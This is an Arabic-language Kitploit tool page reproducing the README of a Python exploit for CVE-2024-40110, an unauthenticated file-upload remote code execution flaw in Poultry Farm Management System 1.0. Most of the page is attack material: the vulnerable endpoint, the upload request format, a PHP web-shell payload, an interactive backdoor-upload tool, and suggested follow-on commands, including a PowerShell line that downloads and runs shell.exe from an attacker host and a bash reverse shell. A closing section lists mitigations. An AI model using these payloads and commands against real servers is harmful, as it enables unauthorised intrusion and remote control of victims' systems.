Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/angry-althaf/cve-2024-40110
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubangry-althaf/cve-2024-40110

CVE-2024-40110

استغلال بايثون لتنفيذ تعليمات برمجية عن بُعد غير مصادق عليه عبر رفع ملف في نظام إدارة مزرعة الدواجن الإصدار 1.0. يقوم برفع قذائف PHP لتنفيذ أوامر نظام عشوائية على الأهداف الضعيفة.

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

نظام إدارة مزرعة الدواجن الإصدار 1.0 - استغلال تنفيذ الأوامر عن بعد (RCE)

نوع الثغرة

رفع ملفات غير موثوق دون مصادقة مع تنفيذ أوامر عن بعد

الوصف

يحتوي نظام إدارة مزرعة الدواجن الإصدار 1.0 على ثغرة أمنية حرجة في وظيفة رفع المنتجات. يفشل التطبيق في التحقق من صحة ملفات الرفع وتنقيتها بشكل صحيح، مما يسمح للمهاجمين برفع ملفات PHP متنكرة في صورة صور منتجات. يمكن تنفيذ ملفات PHP المرفوعة هذه لتحقيق تنفيذ أوامر عن بعد.

نقطة النهاية المعرضة للخطر

root@kitploit:~
POST /paultry/farm/product.php أو POST /farm/product.php

متجه الهجوم

يمكن استغلال الثغرة من خلال:

  1. إرسال طلب POST إلى نقطة نهاية رفع المنتج
  2. رفع ملف PHP شل يحتوي على أوامر عشوائية
  3. الوصول إلى الملف المرفوع لتنفيذ الأوامر المضمنة

المتطلبات

المتطلبات الأساسية

  • Python 3.7+
  • مكتبة requests
  • مكتبة colorama (للإخراج الملون)
  • الوصول إلى الشبكة للهدف المعرض

التثبيت

root@kitploit:~
pip install requests colorama

أو تثبيت جميع التبعيات:

root@kitploit:~
pip install -r requirements.txt

الاستخدام

الاستخدام الأساسي

شغّل البرنامج النصي بشكل تفاعلي:

root@kitploit:~
python exploit.py

سيطلب منك البرنامج النصي:

  1. عنوان IP الهدف - عنوان IP للخادم المعرض
  2. المنفذ الهدف - رقم المنفذ (الافتراضي: 80)
  3. الأمر المراد تنفيذه - أمر النظام لتشغيله على الهدف

مثال

root@kitploit:~
==================================================
أداة رفع الباب الخلفي التفاعلية
==================================================

أدخل عنوان IP الهدف: 192.168.1.100
أدخل المنفذ الهدف (الافتراضي: 80): 8080
أدخل الأمر المراد تنفيذه (الافتراضي: حمولة باورشيل):
الأمر: whoami

==================================================
التأكيد
==================================================
عنوان URL الهدف: http://192.168.1.100:8080
الأمر: whoami
هل تريد المتابعة؟ (نعم/لا): نعم

الميزات

✅ إدخال تفاعلي - يطلب IP والمنفذ والأوامر المخصصة
✅ قيم افتراضية - افتراضيات مناسبة للراحة
✅ إخراج ملون - إخراج طرفية ملون سهل القراءة
✅ خطوة تأكيد - تحقق من الإعدادات قبل التنفيذ
✅ معالجة الأخطاء - رسائل خطأ مهذبة للطلبات الفاشلة
✅ أوامر مرنة - دعم لأي أمر شل أو حمولة باورشيل

الأوامر الشائعة

أهداف ويندوز

root@kitploit:~
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"

أهداف لينكس

root@kitploit:~
bash -i >& /dev/tcp/attacker-ip/4444 0>&1

جمع المعلومات

root@kitploit:~
whoami
id
ifconfig
hostname
pwd

التفاصيل الفنية

كيفية العمل

  1. رفع الملف: إرسال طلب POST مع حمولة PHP مضمنة كملف
  2. تنفيذ الحمولة: يتم تخزين ملف PHP المرفوع في /assets/img/productimages/
  3. تنفيذ الأمر: الوصول إلى ملف PHP يؤدي إلى تنفيذ الأمر عبر دالة system()
  4. استرجاع الإخراج: يقوم البرنامج النصي بجلب الإخراج عبر طلب GET

هيكل الطلب

root@kitploit:~
POST /paultry/farm/product.php
Content-Type: multipart/form-data

category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]

تنسيق الحمولة

root@kitploit:~
<?php system('COMMAND_HERE');?>

بيئة الاختبار

تم اختبار الاستغلال على:

  • نظام التشغيل: Windows 10
  • الخادم: XAMPP v3.3.0
  • إصدار PHP: متوافق مع PHP 5.6+

إخلاء المسؤولية

⚠️ تحذير قانوني

هذه الأداة مقدمة لأغراض اختبار الأمان المصرح به والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

  • استخدم هذا الاستغلال فقط على الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها
  • لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذه الأداة
  • يتحمل المستخدمون مسؤولية ضمان امتثالهم لجميع القوانين واللوائح المعمول بها
  • الوصول غير المصرح به، أو التعديل، أو تعطيل أنظمة الكمبيوتر هو جريمة فيدرالية بموجب قانون الاحتيال وإساءة استخدام الكمبيوتر (CFAA) وقوانين مماثلة في جميع أنحاء العالم

التخفيف

للمسؤولين

  1. تحديث البرامج - تطبيق التصحيحات الأمنية إذا كانت متاحة

  2. التحقق من صحة رفع الملفات

    • التحقق من امتدادات الملفات (القائمة البيضاء: jpg, png, gif, إلخ.)
    • فحص أنواع MIME من جانب الخادم
    • تخزين الملفات المرفوعة خارج الجذر الرئيسي للويب
    • تعطيل تنفيذ البرامج النصية في أدلة الرفع
  3. التكوين

    root@kitploit:~
    <Directory /uploads>
        php_flag engine off
        AddType text/plain .php .phtml .php3 .php4 .php5 .phar
    </Directory>
    
  4. التحكم في الوصول

    • تنفيذ المصادقة قبل السماح برفع الملفات
    • التحقق من صلاحيات المستخدم
    • إضافة الحد من المعدل
  5. المراقبة

    • مراقبة أدلة الرفع للملفات المشبوهة
    • تسجيل جميع محاولات الرفع
    • تنفيذ فحص سلامة الملفات

المراجع

  • Exploit DB: https://www.exploit-db.com/exploits/52053
  • GitHub: https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
  • البرنامج الأصلي: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

استكشاف الأخطاء وإصلاحها

رفض الاتصال

root@kitploit:~
خطأ: تم رفض الاتصال
الحل: تحقق من صحة IP الهدف والمنفذ وأن التطبيق قيد التشغيل

404 غير موجود

root@kitploit:~
خطأ: فشل رفع الشل. رمز الحالة: 404
الحل: قد يختلف مسار نقطة النهاية. المسارات الشائعة: /farm/، /paultry/farm/

لم يتم تنفيذ PHP

root@kitploit:~
خطأ: إخراج الأمر فارغ
الحل: قد يكون تنفيذ PHP معطلاً أو لم يتم رفع الملف بشكل صحيح

الدعم

للاستفسارات أو المشكلات أو التحسينات، راجع مستودع GitHub أو صفحة Exploit-DB.


آخر تحديث: ديسمبر 2024
الحالة: تم التحقق منه واختباره

تنزيل الأداة